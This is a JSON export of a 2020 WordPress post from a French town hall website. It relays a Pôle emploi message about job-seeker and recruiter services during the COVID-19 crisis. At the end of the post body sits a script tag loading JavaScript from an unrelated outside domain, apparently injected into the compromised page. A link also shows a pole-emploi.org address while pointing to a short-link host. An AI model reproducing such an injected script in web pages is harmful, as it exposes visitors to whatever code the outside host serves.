{"id":2449,"date":"2020-03-23T19:06:41","date_gmt":"2020-03-23T18:06:41","guid":{"rendered":"http:\/\/www.attin-mairie.fr\/?p=2449"},"modified":"2020-03-23T19:06:41","modified_gmt":"2020-03-23T18:06:41","slug":"pole-emploi-sadresse-aux-maires-des-communes","status":"publish","type":"post","link":"https:\/\/www.attin-mairie.fr\/?p=2449","title":{"rendered":"Pole emploi s&rsquo;adresse aux maires des communes"},"content":{"rendered":"<p>Afin d&rsquo;accompagner au mieux les demandeurs d&#8217;emploi tout le temps de la crise sanitaire qui nous frappe, Pole Emploi demande aux maires des communes de relayer l&rsquo;information qui suit. Nous vous communiquons copie du mail re\u00e7u \u00e0 ce sujet en mairie d&rsquo;Attin.<\/p>\n<p>Monsieur le Maire,<\/p>\n<p>Dans cette p\u00e9riode que nous traversons, P\u00f4le emploi reste particuli\u00e8rement engag\u00e9 \u00e0 accompagner les populations les plus fragiles et r\u00e9pondre aux besoins de recrutement imm\u00e9diats pour faire face \u00e0 la crise sanitaire. &nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Aujourd\u2019hui, cette organisation nous a permis de s\u00e9curiser les activit\u00e9s essentielles pour nos concitoyens :<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li><strong>\u00catre indemnis\u00e9<\/strong>: les services li\u00e9s au versement des allocations fonctionnent normalement. Nous n\u2019avons aucun de retard de traitement.<\/li>\n<li><strong>S\u2019inscrire \u00e0 P\u00f4le Emploi et \u00eatre accompagn\u00e9<\/strong>: Accueil t\u00e9l\u00e9phonique, Traitement des demandes par mails, propositions d\u2019emploi sur les secteurs sensibles.<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>Depuis le 16 mars 2020, nos conseillers ont r\u00e9pondu \u00e0 plus de <strong>16 200 appels t\u00e9l\u00e9phoniques au 3949 et 18 000 mails sur<\/strong> la r\u00e9gion Hauts-de-France. &nbsp;<\/p>\n<p>Pr\u00e8s de <strong>53 000 dossiers ont \u00e9t\u00e9 trait\u00e9s<\/strong> et <strong>24 000 entretiens r\u00e9alis\u00e9s en mobilisant prioritairement le t\u00e9l\u00e9phone, la visio conf\u00e9rence ou le mail.<\/strong><\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li><strong>Recruter&nbsp;<\/strong>: Les conseillers entreprises sont joignables <strong>au 3995<\/strong>. Ils se mobilisent pour r\u00e9pondre aux besoins de recrutement et particuli\u00e8rement sur les secteurs sensibles : Sant\u00e9, Agroalimentaire, Agriculture, Chimie, Pharmacie, \u00c9nergie, Transport, Logistique \u2026<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>Nos conseillers entreprises ont trait\u00e9 pr\u00e8s de<strong> 1 200 appels et 1 435 nouvelles offres d\u2019emploi la semaine derni\u00e8re <\/strong>avec une augmentation de plus 10% pour les secteurs sensibles et particuli\u00e8rement dans le secteur du commerce + 31%.&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Pour se tenir inform\u00e9(e)s, un questions\/r\u00e9ponses est mis \u00e0 disposition \u00e0 l\u2019adresse suivante :<\/p>\n<p><u><a href=\"http:\/\/anws.co\/bHIlK\/%7b9f8d41aa-d097-46bb-ba43-166bf9a5f6d7%7d\">http:\/\/www.pole-emploi.org\/accueil\/communiques\/pole-emploi-face-a-la-crise-sanitaire-covid-19-reponses-aux-questions.html?type=article<\/a>,<\/u><\/p>\n<p>ce question\/r\u00e9ponse est actualis\u00e9 et compl\u00e9t\u00e9 r\u00e9guli\u00e8rement.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Nous sommes tous mobilis\u00e9s pour que nos missions de Service Public soient r\u00e9alis\u00e9es.<\/p>\n<p>&nbsp;<\/p>\n<p>Je suis disponible pour r\u00e9pondre \u00e0 vos questions.<\/p>\n<p>&nbsp;<\/p>\n<p>Bien \u00e0 vous,<\/p>\n<p>&nbsp;<\/p>\n<p>Le directeur d\u2019Agence.<\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Afin d&rsquo;accompagner au mieux les demandeurs d&#8217;emploi tout le temps de la crise sanitaire qui nous frappe, Pole Emploi demande aux maires des communes de relayer l&rsquo;information qui suit. Nous vous communiquons copie du mail re\u00e7u \u00e0 ce sujet en mairie d&rsquo;Attin. Monsieur le Maire, Dans cette p\u00e9riode que nous traversons, P\u00f4le emploi reste particuli\u00e8rement [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2448,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-2449","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-non-classe"],"_links":{"self":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2449","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2449"}],"version-history":[{"count":1,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2449\/revisions"}],"predecessor-version":[{"id":2450,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2449\/revisions\/2450"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/media\/2448"}],"wp:attachment":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2449"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2449"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2449"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}